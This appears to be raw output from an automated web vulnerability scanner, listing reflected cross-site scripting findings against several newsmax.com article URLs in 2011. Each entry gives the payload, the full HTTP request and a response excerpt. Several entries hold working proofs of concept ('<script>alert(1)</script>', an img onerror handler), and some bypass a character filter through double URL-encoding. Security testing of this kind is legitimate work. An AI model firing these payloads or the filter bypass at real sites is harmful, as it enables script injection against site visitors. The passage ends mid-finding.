The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f0ec'%20a%3db%200d25f46eeae was submitted in the REST URL parameter 2. This input was echoed as 7f0ec' a=b 0d25f46eeae in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin7f0ec'%20a%3db%200d25f46eeae/2011/03/18/id/389924 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45921 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin7f0ec' a=b 0d25f46eeae/2011/03/18/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93755'%20a%3db%20af3bda33851 was submitted in the REST URL parameter 3. This input was echoed as 93755' a=b af3bda33851 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/201193755'%20a%3db%20af3bda33851/03/18/id/389924 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45921 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/201193755' a=b af3bda33851/03/18/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25499'%20a%3db%2013dbdb043e was submitted in the REST URL parameter 4. This input was echoed as 25499' a=b 13dbdb043e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/0325499'%20a%3db%2013dbdb043e/18/id/389924 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45912 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/0325499' a=b 13dbdb043e/18/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30ca2'%20a%3db%20db0bf94c2c9 was submitted in the REST URL parameter 5. This input was echoed as 30ca2' a=b db0bf94c2c9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/1830ca2'%20a%3db%20db0bf94c2c9/id/389924 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45921 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/1830ca2' a=b db0bf94c2c9/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3562'%20a%3db%20219ba10a3f8 was submitted in the REST URL parameter 7. This input was echoed as e3562' a=b 219ba10a3f8 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924e3562'%20a%3db%20219ba10a3f8 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41321 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924e3562' a=b 219ba10a3f8' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a45d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9f287766a11 was submitted in the REST URL parameter 7. This input was echoed as 4a45d"><img src=a onerror=alert(1)>9f287766a11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/3899244a45d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9f287766a11 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41769 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(3899244a45d"><img src=a onerror=alert(1)>9f287766a11);" class="article_tools_link"> ...[SNIP]...
1.7. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b2e"><script>alert(1)</script>6a58b4e89c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?72b2e"><script>alert(1)</script>6a58b4e89c1=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46152 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?72b2e"><script>alert(1)</script>6a58b4e89c1=1')" class="article_tools_link"> ...[SNIP]...
1.8. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b5eb'><script>alert(1)</script>04af1edded7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?1b5eb'><script>alert(1)</script>04af1edded7=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46147 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?1b5eb'><script>alert(1)</script>04af1edded7=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64891'%20a%3db%2081688a489b9 was submitted in the REST URL parameter 2. This input was echoed as 64891' a=b 81688a489b9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms64891'%20a%3db%2081688a489b9/2011/03/17/id/371701 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46364 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms64891' a=b 81688a489b9/2011/03/17/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9c50'%20a%3db%20dd3ff6641cd was submitted in the REST URL parameter 3. This input was echoed as c9c50' a=b dd3ff6641cd in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011c9c50'%20a%3db%20dd3ff6641cd/03/17/id/371701 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46364 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011c9c50' a=b dd3ff6641cd/03/17/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f968b'%20a%3db%206771464688f was submitted in the REST URL parameter 4. This input was echoed as f968b' a=b 6771464688f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03f968b'%20a%3db%206771464688f/17/id/371701 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46364 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03f968b' a=b 6771464688f/17/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c87e'%20a%3db%2030e6dac8390 was submitted in the REST URL parameter 5. This input was echoed as 5c87e' a=b 30e6dac8390 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/175c87e'%20a%3db%2030e6dac8390/id/371701 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46364 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/175c87e' a=b 30e6dac8390/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288e0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e40508d0de2 was submitted in the REST URL parameter 7. This input was echoed as 288e0"><img src=a onerror=alert(1)>40508d0de2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701288e0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e40508d0de2 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41515 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(371701288e0"><img src=a onerror=alert(1)>40508d0de2);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 139d9'%20a%3db%20f3748a4328f was submitted in the REST URL parameter 7. This input was echoed as 139d9' a=b f3748a4328f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701139d9'%20a%3db%20f3748a4328f HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41078 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701139d9' a=b f3748a4328f' class="article_tools_link"> ...[SNIP]...
1.15. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c7a7f'><script>alert(1)</script>5a04eb222fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?c7a7f'><script>alert(1)</script>5a04eb222fb=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46586 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:51 GMT Connection: close
